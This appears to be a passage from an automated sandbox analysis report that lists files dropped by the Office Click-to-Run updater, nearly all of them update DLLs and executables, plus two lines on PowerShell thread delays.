    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3899Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2490Jump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-synch-l1-2-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-processthreads-l1-1-1.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVPolicy.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVManifest.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.zh-cn.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.hu-hu.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVCatalog.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVShNotify.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.nb-no.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-locale-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.en-us.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\MavInject32.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.el-gr.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\ApiClient.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-file-l2-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVPolicy.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.sr-latn-rs.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sk-sk.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sv-se.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ApiClient.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvStreamingManager.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.he-il.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVManifest.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.bg-bg.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\repoman.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fi-fi.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeC2RClient.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fr-ca.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ro-ro.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\officesvcmgr.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-process-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sl-si.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-conio-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.th-th.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\vcruntime140_1.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-filesystem-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.cs-cz.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\repoman.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-multibyte-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppvIsvSubsystems64.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems64.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ja-jp.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvVirtualization.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVOrchestration.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\manageability.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.he-il.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ro-ro.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.sl-si.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.es-es.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.kk-kz.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems64_arm64x.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.id-id.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\officesvcmgr.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.fi-fi.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\policy.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.pl-pl.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-file-l1-2-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.vi-vn.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\c2r64werhandler.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ko-kr.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.en-gb.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.en-gb.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\appvcleaner.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2R32.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIntegration.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.da-dk.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\c2r64werhandler.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.vi-vn.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-xstate-l2-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-localization-l1-2-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.uk-ua.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\inventory.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.nl-nl.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.et-ee.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems32.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.de-de.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\InspectorOfficeGadget.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pt-br.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.sk-sk.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeC2RCom.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-string-l1-1-0.dll (copy)Jump to dropped file
